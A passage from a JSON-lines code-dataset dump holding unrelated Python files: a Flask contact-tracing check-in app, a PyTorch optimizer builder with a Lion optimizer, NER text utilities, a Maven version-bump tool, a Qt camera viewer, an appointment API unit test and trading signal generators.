str(datetime.now()) +\n '\")),' +\n 'AND(IS_AFTER({Exit Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_BEFORE({Exit Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_BEFORE({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\"),IS_AFTER({Exit Time},\"' +\n str(datetime.now()) +\n '\")),' +\n 'AND(IS_SAME({Entrance Time},\"' +\n str(record[\"fields\"][\"Entrance Time\"]) +\n '\")),' +\n 'AND(IS_SAME({Exit Time},\"' +\n str(datetime.now()) +\n '\"))),IF({Persons ID}!=\"' +\n str(record[\"fields\"][\"Persons ID\"]) +\n '\",TRUE(),FALSE()))',)\n contactsID =[]\n for i in contacts:\n\n if i[\"fields\"][\"Related User\"][0] != record[\"fields\"][\"Related User\"][0]:\n\n contactsID.append(i[\"fields\"][\"Related User\"][0])\n\n entry_table.update_by_field('Entry Record ID', record[\"fields\"][\"Entry Record ID\"], {'Contacts': contactsID})\n\n return render_template('donecheckout.html')\n\n else:\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n return render_template('donecheckin.html')\n else:\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n return render_template('donecheckin.html')\n print(request.form['idNumber'])\n\n return render_template('donecheckin.html')\n\n\n@app.route('/registerandcheckin', methods=['GET', 'POST'])\ndef registerAndCheckin():\n\n users_table.insert({'Full Name': request.form['name'], \"ID Number\": request.form['idNumber'],\n 'Street Address': request.form['address'], 'Phone Number': request.form['phone']})\n\n entry_table.insert({\"Related Place\": [request.form['storeID']],\n \"Related User\": [users_table.search('ID Number', request.form['idNumber'])[0][\"id\"]],\n \"Entrance Time\": str(datetime.now()),})\n\n print(request.form['idNumber'])\n\n return render_template('donecheckin.html')\n\n\n@app.route('/service-worker.js')\ndef sw():\n return app.send_static_file('service-worker.js')\n\nif __name__ == '__main__':\n from os import environ\n app.run(debug=False, host='0.0.0.0', port=environ.get(\"PORT\", 5000))\n","repo_name":"simple-tracer/flamingo","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9318630058","text":"import math\n\nfrom mmcv import Config\nfrom mmcv.runner import build_optimizer as mm_build_optimizer, OPTIMIZER_BUILDERS, DefaultOptimizerConstructor, \\\n OPTIMIZERS\nfrom mmcv.utils import _BatchNorm, _InstanceNorm\nfrom torch.nn import GroupNorm, LayerNorm\n\nfrom .logger import get_root_logger\n\nfrom typing import Tuple, Optional, Callable\n\nimport torch\nfrom torch.optim.optimizer import Optimizer\n\n\ndef auto_scale_lr(effective_bs, optimizer_cfg, rule='linear', base_batch_size=256):\n assert rule in ['linear', 'sqrt']\n logger = get_root_logger()\n # scale by world size\n if rule == 'sqrt':\n scale_ratio = math.sqrt(effective_bs / base_batch_size)\n elif rule == 'linear':\n scale_ratio = effective_bs / base_batch_size\n optimizer_cfg['lr'] *= scale_ratio\n logger.info(f'Automatically adapt lr to {optimizer_cfg[\"lr\"]:.5f} (using {rule} scaling rule).')\n return scale_ratio\n\n\n@OPTIMIZER_BUILDERS.register_module()\nclass MyOptimizerConstructor(DefaultOptimizerConstructor):\n\n def add_params(self, params, module, prefix='', is_dcn_module=None):\n \"\"\"Add all parameters of module to the params list.\n\n The parameters of the given module will be added to the list of param\n groups, with specific rules defined by paramwise_cfg.\n\n Args:\n params (list[dict]): A list of param groups, it will be modified\n in place.\n module (nn.Module): The module to be added.\n prefix (str): The prefix of the module\n\n \"\"\"\n # get param-wise options\n custom_keys = self.paramwise_cfg.get('custom_keys', {})\n # first sort with alphabet order and then sort with reversed len of str\n # sorted_keys = sorted(sorted(custom_keys.keys()), key=len, reverse=True)\n\n bias_lr_mult = self.paramwise_cfg.get('bias_lr_mult', 1.)\n bias_decay_mult = self.paramwise_cfg.get('bias_decay_mult', 1.)\n norm_decay_mult = self.paramwise_cfg.get('norm_decay_mult', 1.)\n bypass_duplicate = self.paramwise_cfg.get('bypass_duplicate', False)\n\n # special rules for norm layers and depth-wise conv layers\n is_norm = isinstance(module,\n (_BatchNorm, _InstanceNorm, GroupNorm, LayerNorm))\n\n for name, param in module.named_parameters(recurse=False):\n base_lr = self.base_lr\n if name == 'bias' and not (is_norm or is_dcn_module):\n base_lr *= bias_lr_mult\n\n # apply weight decay policies\n base_wd = self.base_wd\n if self.base_wd is not None:\n # norm decay\n if is_norm:\n base_wd *= norm_decay_mult\n # bias lr and decay\n elif name == 'bias' and not is_dcn_module:\n # TODO: current bias_decay_mult will have affect on DCN\n base_wd *= bias_decay_mult\n\n param_group = {'params': [param]}\n if not param.requires_grad:\n param_group['requires_grad'] = False\n params.append(param_group)\n continue\n if bypass_duplicate and self._is_in(param_group, params):\n logger = get_root_logger()\n logger.warn(f'{prefix} is duplicate. It is skipped since '\n f'bypass_duplicate={bypass_duplicate}')\n continue\n # if the parameter match one of the custom keys, ignore other rules\n is_custom = False\n for key in custom_keys:\n if isinstance(key, tuple):\n scope, key_name = key\n else:\n scope, key_name = None, key\n if scope is not None and scope not in f'{prefix}':\n continue\n if key_name in f'{prefix}.{name}':\n is_custom = True\n if 'lr_mult' in custom_keys[key]:\n # if 'base_classes' in f'{prefix}.{name}' or 'attn_base' in f'{prefix}.{name}':\n # param_group['lr'] = self.base_lr\n # else:\n param_group['lr'] = self.base_lr * custom_keys[key]['lr_mult']\n elif 'lr' not in param_group:\n param_group['lr'] = base_lr\n if self.base_wd is not None:\n if 'decay_mult' in custom_keys[key]:\n param_group['weight_decay'] = self.base_wd * custom_keys[key]['decay_mult']\n elif 'weight_decay' not in param_group:\n param_group['weight_decay'] = base_wd\n\n if not is_custom:\n # bias_lr_mult affects all bias parameters\n # except for norm.bias dcn.conv_offset.bias\n if base_lr != self.base_lr:\n param_group['lr'] = base_lr\n if base_wd != self.base_wd:\n param_group['weight_decay'] = base_wd\n params.append(param_group)\n\n for child_name, child_mod in module.named_children():\n child_prefix = f'{prefix}.{child_name}' if prefix else child_name\n self.add_params(\n params,\n child_mod,\n prefix=child_prefix,\n is_dcn_module=is_dcn_module)\n\n\ndef build_optimizer(model, optimizer_cfg):\n # default parameter-wise config\n logger = get_root_logger()\n\n if hasattr(model, 'module'):\n model = model.module\n # set optimizer constructor\n optimizer_cfg.setdefault('constructor', 'MyOptimizerConstructor')\n # parameter-wise setting: cancel weight decay for some specific modules\n custom_keys = dict()\n for name, module in model.named_modules():\n if hasattr(module, 'zero_weight_decay'):\n custom_keys.update({(name, key): dict(decay_mult=0) for key in module.zero_weight_decay})\n\n paramwise_cfg = Config(dict(cfg=dict(custom_keys=custom_keys)))\n given_cfg = optimizer_cfg.get('paramwise_cfg')\n if given_cfg:\n paramwise_cfg.merge_from_dict(dict(cfg=given_cfg))\n optimizer_cfg['paramwise_cfg'] = paramwise_cfg.cfg\n # build optimizer\n optimizer = mm_build_optimizer(model, optimizer_cfg)\n\n weight_decay_groups = dict()\n lr_groups = dict()\n for group in optimizer.param_groups:\n if not group.get('requires_grad', True): continue\n lr_groups.setdefault(group['lr'], []).append(group)\n weight_decay_groups.setdefault(group['weight_decay'], []).append(group)\n\n learnable_count, fix_count = 0, 0\n for p in model.parameters():\n if p.requires_grad:\n learnable_count += 1\n else:\n fix_count += 1\n fix_info = f\"{learnable_count} are learnable, {fix_count} are fix\"\n lr_info = \"Lr group: \" + \", \".join([f'{len(group)} params with lr {lr:.5f}' for lr, group in lr_groups.items()])\n wd_info = \"Weight decay group: \" + \", \".join(\n [f'{len(group)} params with weight decay {wd}' for wd, group in weight_decay_groups.items()])\n opt_info = f\"Optimizer: total {len(optimizer.param_groups)} param groups, {fix_info}. {lr_info}; {wd_info}.\"\n logger.info(opt_info)\n\n return optimizer\n\n\n@OPTIMIZERS.register_module()\nclass Lion(Optimizer):\n def __init__(\n self,\n params,\n lr: float = 1e-4,\n betas: Tuple[float, float] = (0.9, 0.99),\n weight_decay: float = 0.0,\n ):\n assert lr > 0.\n assert all([0. <= beta <= 1. for beta in betas])\n\n defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)\n\n super().__init__(params, defaults)\n\n @staticmethod\n def update_fn(p, grad, exp_avg, lr, wd, beta1, beta2):\n # stepweight decay\n p.data.mul_(1 - lr * wd)\n\n # weight update\n update = exp_avg.clone().lerp_(grad, 1 - beta1).sign_()\n p.add_(update, alpha=-lr)\n\n # decay the momentum running average coefficient\n exp_avg.lerp_(grad, 1 - beta2)\n\n @staticmethod\n def exists(val):\n return val is not None\n\n @torch.no_grad()\n def step(\n self,\n closure: Optional[Callable] = None\n ):\n\n loss = None\n if self.exists(closure):\n with torch.enable_grad():\n loss = closure()\n\n for group in self.param_groups:\n for p in filter(lambda p: self.exists(p.grad), group['params']):\n\n grad, lr, wd, beta1, beta2, state = p.grad, group['lr'], group['weight_decay'], *group['betas'], \\\n self.state[p]\n\n # init state - exponential moving average of gradient values\n if len(state) == 0:\n state['exp_avg'] = torch.zeros_like(p)\n\n exp_avg = state['exp_avg']\n\n self.update_fn(\n p,\n grad,\n exp_avg,\n lr,\n wd,\n beta1,\n beta2\n )\n\n return loss\n","repo_name":"Navezjt/PixArt-alpha","sub_path":"diffusion/utils/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":9094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30201562650","text":"'''\nDescription: \nAuthor: Shengxiang Hu\nGithub: https://github.com/MTleen\nDate: 2021-08-02 10:06:37\nLastEditors: Shengxiang Hu\nLastEditTime: 2021-08-03 15:10:27\nFilePath: /NER_bert_29/home/user/shu/infoExtraction/tools/man_utils.py\n'''\nimport numpy as np\nimport os\nimport json\n\ndef seg_text(data, max_length):\n # 切分长句子\n # 为保证语料的语义完整性,取长度小于 self.test_max_length 的语义完整的最大子串\n sep_list = [',', '。']\n # 计算 ,或。在原始语料中的 index\n sep_idx = [i for i, t in enumerate(data) if t in sep_list]\n # 根据 index 和 max_length 计算所属子句\n sep_idx_mask = (np.array(sep_idx) // max_length).tolist()\n data_trunc = []\n start_idx = 0\n for i in list(set(sep_idx_mask))[1:]:\n end_idx = sep_idx[sep_idx_mask.index(i)] + 1\n subseq = data[start_idx: end_idx]\n if len(subseq) > 0:\n data_trunc.append({'text': data[start_idx: end_idx], 'hash': hash(data)})\n # data_trunc.append({'text': data[start_idx: end_idx], 'hash': hash(data), 'origin_text': data})\n # start_idx = end_idx + 1\n if start_idx < len(data):\n data_trunc.append({'text': data[start_idx:], 'hash': hash(data)})\n # data_trunc.append({'text': data[start_idx:], 'hash': hash(data), 'origin_text': data})\n return data_trunc\n\n\ndef restore_text(orig_text, preds):\n # 原始语料分片\n pred_result = []\n pred_res_dict = {}\n for item in zip(orig_text, preds):\n hash_val = item[0]['hash']\n tmp_dict = {'text': item[0]['text'], 'entities': item[1]}\n if hash_val in pred_res_dict.keys():\n # 还原实体 idx\n if len(tmp_dict['entities']) > 0:\n for e in tmp_dict['entities']:\n e['start_idx'] += len(pred_res_dict[hash_val]['text']) + 1\n e['end_idx'] += len(pred_res_dict[hash_val]['text']) + 1\n\n pred_res_dict[hash_val]['text'] += tmp_dict['text']\n pred_res_dict[hash_val]['entities'] += tmp_dict['entities']\n else:\n pred_res_dict[hash_val] = tmp_dict\n # 将最终文本替换成原始文本\n # for item in orig_text:\n # pred_res_dict[item['hash']]['text'] = item['origin_text']\n # pred_result.append(tmp_dict)\n pred_result = list(pred_res_dict.values())\n return pred_result","repo_name":"274349293/MedBrain","sub_path":"infoExtraction/tools/man_utils.py","file_name":"man_utils.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16427608545","text":"import re\nfrom enum import Enum\nfrom re import Match\nfrom typing import ClassVar, Dict, List, Pattern, Set, Union, cast\n\nfrom java.maven.maven_module import MavenModule\nfrom java.maven.maven_module_identifier import MavenModuleIdentifier\nfrom java.maven.xml_maven_module import XmlMavenModule\nfrom java.maven.xml_maven_module_identifier import XmlMavenModuleIdentifier\nfrom java.maven.xml_maven_property import XmlMavenProperty\nfrom utility.type_utility import get_or_else\nfrom utility.xml.xml_node import XmlNode\n\n\nclass XmlMavenProject:\n SEMANTIC_VERSION: ClassVar[Pattern] = re.compile(\n r\"^(?P\\D+)?(?P\\d+)\\.(?P\\d+)\\.(?P\\d+)(?P\\D.+)?$\"\n )\n PROPERTY: ClassVar[Pattern] = re.compile(r\"^\\$\\{(?P[^}]+)}$\")\n\n class VersionBumpType(Enum):\n MAJOR = \"major\"\n MINOR = \"minor\"\n PATCH = \"patch\"\n\n def __init__(self):\n self._modules: Dict[str, XmlMavenModule] = {}\n\n def add_modules(self, *modules: XmlMavenModule) -> None:\n for module in modules:\n module_id: str = self._module_id(module)\n if module_id not in self._modules:\n self._modules[module_id] = module\n\n def get_module_versions(self) -> Dict[XmlMavenModule, str]:\n return {\n module: self._resolve_version_property_node(module, module.identifier).text\n for module in self._modules.values()\n }\n\n def bump_version(\n self,\n bump_type: \"XmlMavenProject.VersionBumpType\",\n assert_uniform_version: bool = True,\n write_modules: bool = True,\n ) -> None:\n current_versions: Dict[str, str] = {\n self._module_id(module): version\n for module, version in self.get_module_versions().items()\n }\n\n if assert_uniform_version:\n versions: Set[str] = set(current_versions.values())\n if len(versions) != 1:\n raise AssertionError(\n f\"The Maven project is expected to have a uniform version, but multiple versions were found.\"\n )\n\n updated_versions: Dict[str, str] = self._bump_versions(\n current_versions, bump_type\n )\n\n for module in self._modules.values():\n self._set_version(module, updated_versions, write_modules)\n\n def _collect_current_versions(self) -> Dict[str, str]:\n return {\n self._module_id(module): self._resolve_version_property_node(\n module, module.identifier\n ).text\n for module in self._modules.values()\n }\n\n def _module_id(self, module: Union[MavenModule, MavenModuleIdentifier]) -> str:\n module_id: MavenModuleIdentifier\n if isinstance(module, MavenModule):\n module_id = cast(MavenModule, module).identifier\n\n elif isinstance(module, MavenModuleIdentifier):\n module_id = cast(MavenModuleIdentifier, module)\n\n else:\n raise AssertionError(f\"Unable to determine module id of '{module}'.\")\n\n return f\"{module_id.group_id}:{module_id.artifact_id}\"\n\n def _bump_versions(\n self, versions: Dict[str, str], bump_type: \"XmlMavenProject.VersionBumpType\"\n ) -> Dict[str, str]:\n result: Dict[str, str] = {}\n for key, value in versions.items():\n match: Match = XmlMavenProject.SEMANTIC_VERSION.match(value)\n if match is None:\n raise AssertionError(\n f\"Version of module '{key}' ('{value}') is not a valid semantic version.\"\n )\n\n major: int = int(match.group(\"major\"))\n minor: int = int(match.group(\"minor\"))\n patch: int = int(match.group(\"patch\"))\n\n prefix: str = get_or_else(match.group(\"prefix\"), \"\")\n suffix: str = get_or_else(match.group(\"suffix\"), \"\")\n\n if bump_type == XmlMavenProject.VersionBumpType.MAJOR:\n major += 1\n minor = 0\n patch = 0\n\n elif bump_type == XmlMavenProject.VersionBumpType.MINOR:\n minor += 1\n patch = 0\n\n elif bump_type == XmlMavenProject.VersionBumpType.PATCH:\n patch += 1\n\n else:\n raise AssertionError(f\"Unknown version bump type '{bump_type}'.\")\n\n result[key] = f\"{prefix}{major}.{minor}.{patch}{suffix}\"\n\n return result\n\n def _set_version(\n self,\n module: XmlMavenModule,\n updated_versions: Dict[str, str],\n write_modules: bool,\n ) -> None:\n if module.parent_identifier is not None:\n parent_id: str = self._module_id(module.parent_identifier)\n if parent_id in updated_versions:\n self._resolve_version_property_node(\n module, module.parent_identifier\n ).text = updated_versions[parent_id]\n\n module_id: str = self._module_id(module.identifier)\n if module_id in updated_versions:\n self._resolve_version_property_node(\n module, module.identifier\n ).text = updated_versions[module_id]\n\n for dependency in module.dependencies:\n dependency_id: str = self._module_id(dependency)\n if dependency_id not in updated_versions:\n continue\n\n self._resolve_version_property_node(\n module, dependency\n ).text = updated_versions[dependency_id]\n\n if write_modules:\n module.xml_document.save(module.pom_file)\n\n def _resolve_version_property_node(\n self, module: MavenModule, module_id: MavenModuleIdentifier\n ) -> XmlNode:\n if not isinstance(module_id, XmlMavenModuleIdentifier):\n raise AssertionError(\n f\"Unable to determine version XML node for module '{module.identifier}'.\"\n )\n\n return self._resolve_property_node(\n module, cast(XmlMavenModuleIdentifier, module_id).version_node\n )\n\n def _resolve_property_node(self, module: MavenModule, node: XmlNode) -> XmlNode:\n match: Match = XmlMavenProject.PROPERTY.match(node.text)\n if match is None:\n return node\n\n return self._find_property_node(module, match.group(\"name\"))\n\n def _find_property_node(self, module: MavenModule, property_name: str) -> XmlNode:\n for p in module.properties:\n if p.name == property_name and isinstance(p, XmlMavenProperty):\n return cast(XmlMavenProperty, p).node\n\n if module.parent_identifier is None:\n raise AssertionError(\n f\"Unable to resolve property '{property_name}' in {module.identifier}.\"\n )\n\n parent_id: str = self._module_id(module.parent_identifier)\n parent_modules: List[XmlMavenModule] = list(\n filter(\n lambda x: self._module_id(x.identifier) == parent_id,\n self._modules.values(),\n )\n )\n\n if len(parent_modules) != 1:\n raise AssertionError(\n f\"Unable to determine parent module '{parent_id}' for module {module.identifier}.\"\n )\n\n return self._find_property_node(parent_modules[0], property_name)\n","repo_name":"DigitalToolsManufactory/dev-scripts","sub_path":"java/maven/xml_maven_project.py","file_name":"xml_maven_project.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25399603301","text":"\"\"\"\nGiven an array and an integer K. Find if there's a triplet in the array which sums up to the given integer K. \n \n\nExample 1:\n\nInput: N = 6, K = 13\narr[] = [1 4 45 6 10 8]\nOutput: true\nExplanation: The triplet {1, 4, 8} in \nthe array sums up to 13.\nExample 2:\n\nInput: N = 5, K = 10\narr[] = [1 2 4 3 6]\nOutput: true\nExplanation: The triplet {1, 3, 6} in \nthe array sums up to 10.\n\nYour Task:\nYou don't need to read input or print anything. Your task is to complete the function find3Numbers() which takes the array arr[], the size of the array (N) and the sum (X) as inputs and returns True if there exists a triplet in the array arr[] which sums up to X and False otherwise.\n\nExpected Time Complexity: O(n2)\nExpected Auxiliary Space: O(1)\n\nConstraints:\n1 ≤ N ≤ 103\n1 ≤ A[i] ≤ 105\n\"\"\"\ndef find3Numbers(arr, N, X):\n arr = sorted(arr)\n for i in range(N-2):\n l=i+1\n r=N-1\n while l None:\n \"\"\"\n QTimer calls this every 20 msec or so to try and grab\n new frame data.\n \"\"\"\n try:\n\n topic = self.frame_sub.recv()\n fm = recv_frame(self.frame_sub)\n except zmq.error.Again:\n return\n\n self.frame = fm\n self._update()\n\n\n #--------------------------------------------------------------------------#\n # Private methods\n\n\n def _update(self):\n self._update_image()\n fm = self.frame\n if fm:\n ix, t = fm.index, fm.time\n self.frame_times.append(t)\n if ix % 30 == 0:\n tarr = np.array(list(self.frame_times))\n diffs = np.ediff1d(tarr)\n fps = 1 / np.mean(diffs)\n msg = \"index={}, time={:.2f}, fps={:.2f}\".format(ix, t, fps)\n print(msg)\n\n\n\n def _update_image(self):\n\n \"\"\"Gets called by cur_frame.setter(). Bounds are guaranteed to be good.\n \"\"\"\n\n if self.frame is None:\n # No data: black screen, empty label.\n self._image.setImage(np.zeros((8, 8)), levels=(0, 1))\n return\n\n data = self.frame.data\n data = data.T\n data = np.flipud(data)\n\n self._image.setImage(data)\n\n\n #--------------------------------------------------------------------------#\n # Reimplemented methods\n\n\n def keyPressEvent(self, event):\n\n key = event.key()\n mods = QtGui.QApplication.queryKeyboardModifiers()\n\n # Quit/close.\n if key in (QtCore.Qt.Key_W, QtCore.Qt.Key_Q) and \\\n mods == QtCore.Qt.ControlModifier:\n self.close()\n\n\n\n\napp = QtWidgets.QApplication(sys.argv)\nwin = CameraPreview()\n\napp.exec_()\ntime.sleep(0.5)\nwin.frame_sub.close()\n\n","repo_name":"scottcanoe/mesoimg","sub_path":"dev/qtplayer.py","file_name":"qtplayer.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44154622327","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport json\nimport unittest\n\nfrom app import app\nfrom config import DataBaseConfig\nfrom core.messages.keys import Keys\nfrom core.result import Result\nfrom persistence.database.entity.car_problem import CarProblem\nfrom persistence.database.entity.job_.autoservice_job import AutoServiceJob\nfrom persistence.database.entity.job_.job import Job\nfrom routers.admin import admin\nfrom routers.authintication import authentication\nfrom routers.car_owner import car_owner\nfrom routers.choose_services import choose_service_grade\nfrom routers.endpoints import Endpoints\nfrom routers.index import index_route\nfrom test_cases.fill_db import init_db\n\n\nclass SetAnAppointmentTest(unittest.TestCase):\n # executed prior to each test\n def setUp(self):\n POSTGRES = {\n 'user': 'postgres',\n 'pw': 'postgres',\n 'db': 'dr-autol-test',\n 'host': 'localhost',\n 'port': '5432',\n }\n app.config['TESTING'] = True\n app.config['WTF_CSRF_ENABLED'] = False\n app.config['DEBUG'] = False\n app.config[\n 'SQLALCHEMY_DATABASE_URI'] = DataBaseConfig.DB_DIALECT + DataBaseConfig.USER_NAME + ':' + DataBaseConfig.PASSWORD + '@' + DataBaseConfig.SERVER_ADDRESS + ':' + DataBaseConfig.PORT + '/' + DataBaseConfig.DATABASE_NAME\n app.register_blueprint(index_route)\n app.register_blueprint(car_owner)\n app.register_blueprint(authentication)\n app.register_blueprint(admin)\n app.register_blueprint(choose_service_grade)\n\n self.app = app.test_client()\n\n # db.drop_all()\n # db.create_all()\n init_db()\n\n # Disable sending emails during unit testing\n # self.assertEqual(app.debug, False)\n\n # executed after each test\n def tearDown(self):\n pass\n\n @classmethod\n def setUpClass(cls):\n pass\n\n @classmethod\n def tearDownClass(cls):\n pass\n\n # success scenario\n\n def _post_request(self, url, data):\n json_obj = json.dumps(data)\n response = self.app.post(url, data=json_obj, content_type='application/json')\n print(response.data)\n return response\n\n def _test_register_job_request(self, data, expected_response, expected_message, expected_params=None):\n with self.app as client:\n with client.session_transaction() as sess:\n sess['user_id'] = 1\n response = self._post_request(Endpoints.CAR_OWNER_SET_APPOINTMENT, data)\n response_dict = json.loads(response.data)\n self.assertEqual(expected_response, response.status_code)\n self.assertEqual(expected_message, response_dict[Keys.MESSAGE])\n if expected_params is not None:\n self.assertEqual(expected_params, response_dict[Keys.PARAMS])\n\n def test_set_appointment_true(self):\n job = AutoServiceJob(id=1, car_id=1, car_owner_id=1, business_owner_id=1, status_id=1, start_schedule=\"2019-1-1 2:2\", finish_schedule=\"2019-1-1 2:1\")\n # car_problems = CarProblem()\n # Jobs.register_problem(db, job, car_problems)\n data = {\n Keys.USER_TYPE: 'auto_service_job',\n \"job\": {\n \"car_owner\": 1,\n \"business_owner\": 1,\n \"car_id\": 1,\n \"car_problem\": {\n Keys.SERVICE_GRADE: \"Common\",\n Keys.SERVICE_CATEGORY: \"AutoService\",\n Keys.SERVICE_DEFINITIONS: {\n Keys.PRODUCTABLE_ITEMS: {1:1, },\n Keys.NON_PRODUCTABLE_ITEMS: []\n },\n },\n Keys.START_SCHEDULE: \"2018-06-06 18:30:33\"\n }\n }\n self._test_register_job_request(data, 200, Result.language.SUCCESS_REGISTER_PROBLEM)\n # self._test_register_job_request(data, 404, Result.language.NOT_IN_SAME_CATEGORY)\n\n def test_set_appointment_true_false(self):\n data = {\n Keys.USER_TYPE: 'auto_service_job',\n \"job\": {\n \"car_owner\": 1,\n \"business_owner\": 1,\n \"car_id\": 'dfdf',\n \"car_problem\": {\n Keys.SERVICE_GRADE: \"Common\",\n Keys.SERVICE_CATEGORY: \"AutoService\",\n Keys.SERVICE_DEFINITIONS: {\n Keys.PRODUCTABLE_ITEMS: {1: 1, 2: 1},\n Keys.NON_PRODUCTABLE_ITEMS: [1]\n },\n },\n Keys.START_SCHEDULE: \"2018-06-06 18:30:33\"\n }\n }\n self._test_register_job_request(data, 400, Result.language.BAD_SCHEMA, expected_params=Result.language.POST_VALIDATION_CAR_ID)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"afsaneh92/dr_autol","sub_path":"test_cases/amish/send_request_notification.py","file_name":"send_request_notification.py","file_ext":"py","file_size_in_byte":4781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73742477672","text":"from typing import Union\n\nimport pandas as pd\nfrom sklearn.base import BaseEstimator\n\nfrom qube.quantitative.ta.indicators import smooth, rsi, ema\nfrom qube.quantitative.tools import srows, scols, apply_to_frame, ohlc_resample\nfrom qube.learn.core.base import signal_generator\nfrom qube.learn.core.data_utils import pre_close_time_shift\nfrom qube.learn.core.utils import _check_frame_columns\nfrom qube.simulator.utils import rolling_forward_test_split\n\n\ndef crossup(x, t: Union[pd.Series, float]):\n t1 = t.shift(1) if isinstance(t, pd.Series) else t\n return x[(x > t) & (x.shift(1) <= t1)].index\n\n\ndef crossdown(x, t: Union[pd.Series, float]):\n t1 = t.shift(1) if isinstance(t, pd.Series) else t\n return x[(x < t) & (x.shift(1) >= t1)].index\n\n\n@signal_generator\nclass RangeBreakoutDetector(BaseEstimator):\n \"\"\"\n Detects breaks of rolling range. +1 for breaking upper range and -1 for bottom one.\n \"\"\"\n\n def __init__(self, threshold=0):\n self.threshold = threshold\n\n def fit(self, X, y, **fit_params):\n return self\n\n def _ohlc_breaks(self, X):\n U, B = X.RangeTop + self.threshold, X.RangeBot - self.threshold\n open, close, high, low = X.open, X.close, X.high, X.low\n\n b1_bU = high.shift(1) <= U.shift(1)\n b1_aL = low.shift(1) >= B.shift(1)\n l_c = (b1_bU | (open <= U)) & (close > U)\n s_c = (b1_aL | (open >= B)) & (close < B)\n l_o = (b1_bU & (open > U))\n s_o = (b1_aL & (open < B))\n\n pre_close = pre_close_time_shift(X)\n\n return srows(\n pd.Series(+1, X[l_o].index), pd.Series(+1, X[(l_c & ~l_o)].index + pre_close),\n pd.Series(-1, X[s_o].index), pd.Series(-1, X[(s_c & ~s_o)].index + pre_close),\n )\n\n def _ticks_breaks(self, X):\n U, B = X.RangeTop + self.threshold, X.RangeBot - self.threshold\n a, b = X.ask, X.bid\n\n break_up = (a.shift(1) <= U.shift(1)) & (a > U)\n break_dw = (b.shift(1) >= B.shift(1)) & (b < B)\n\n return srows(pd.Series(+1, X[break_up].index), pd.Series(-1, X[break_dw].index))\n\n def predict(self, X):\n # take control on how we produce timestamps for signals\n self.exact_time = True\n\n try:\n _check_frame_columns(X, 'RangeTop', 'RangeBot', 'open', 'high', 'low', 'close')\n y0 = self._ohlc_breaks(X)\n\n except ValueError:\n _check_frame_columns(X, 'RangeTop', 'RangeBot', 'bid', 'ask')\n y0 = self._ticks_breaks(X)\n\n return y0\n\n\n@signal_generator\nclass PivotsBreakoutDetector(BaseEstimator):\n @staticmethod\n def _tolist(x):\n return [x] if not isinstance(x, (list, tuple)) else x\n\n def __init__(self, resistances, supports):\n self.resistances = self._tolist(resistances)\n self.supports = self._tolist(supports)\n\n def fit(self, X, y, **fit_params):\n return self\n\n def predict(self, x):\n _check_frame_columns(x, 'open', 'close')\n\n t = scols(x, x.shift(1)[['open', 'close']].rename(columns={'open': 'open_1', 'close': 'close_1'}))\n cols = x.columns\n breaks = srows(\n # breaks up levels specified as resistance\n *[pd.Series(+1, t[(t.open_1 < t[ul]) & (t.close_1 < t[ul]) & (t.close > t[ul])].index) for ul in\n self.resistances if ul in cols],\n\n # breaks down levels specified as supports\n *[pd.Series(-1, t[(t.open_1 > t[bl]) & (t.close_1 > t[bl]) & (t.close < t[bl])].index) for bl in\n self.supports if bl in cols],\n keep='last')\n return breaks\n\n\n@signal_generator\nclass CrossingMovings(BaseEstimator):\n def __init__(self, fast, slow, fast_type='sma', slow_type='sma'):\n self.fast = fast\n self.slow = slow\n self.fast_type = fast_type\n self.slow_type = slow_type\n\n def fit(self, x, y, **fit_args):\n return self\n\n def predict(self, x):\n price_col = self.market_info_.column\n fast_ma = smooth(x[price_col], self.fast_type, self.fast)\n slow_ma = smooth(x[price_col], self.slow_type, self.slow)\n\n return srows(\n pd.Series(+1, crossup(fast_ma, slow_ma)),\n pd.Series(-1, crossdown(fast_ma, slow_ma))\n )\n\n\n@signal_generator\nclass Rsi(BaseEstimator):\n \"\"\"\n Classical RSI entries generator\n \"\"\"\n\n def __init__(self, period, lower=25, upper=75, smoother='sma'):\n self.period = period\n self.upper = upper\n self.lower = lower\n self.smoother = smoother\n\n def fit(self, x, y, **fit_args):\n return self\n\n def predict(self, x):\n price_col = self.market_info_.column\n r = rsi(x[price_col], self.period, smoother=self.smoother)\n return srows(pd.Series(+1, crossup(r, self.lower)), pd.Series(-1, crossdown(r, self.upper)))\n\n\n@signal_generator\nclass OsiMomentum(BaseEstimator):\n \"\"\"\n Outstretched momentum contrarian generator\n\n The idea is to mark rising and falling momentum and then calculate an exponential moving average based on the sum\n of the different momentum moves.\n\n The steps can be summed up as follows:\n\n - Select a momentum lookback and a moving average lookback. By default we can use 3 and 5.\n\n - Create two columns called the Positive Stretch and the Negative Stretch,\n where the first one has 1’s if the current closing price is greater than the closing price 3 periods ago\n and the other one has 1’s if the current closing price is lower than the closing price 3 periods ago.\n\n - Sum the latest three positive and negative stretches and subtract the results from each other.\n This is called the Raw Outstretch.\n\n - Finally, to get the Outstretched Indicator, we take the 5-period exponential moving average of the Raw Outstretch.\n\n \"\"\"\n\n def __init__(self, period, smoothing, 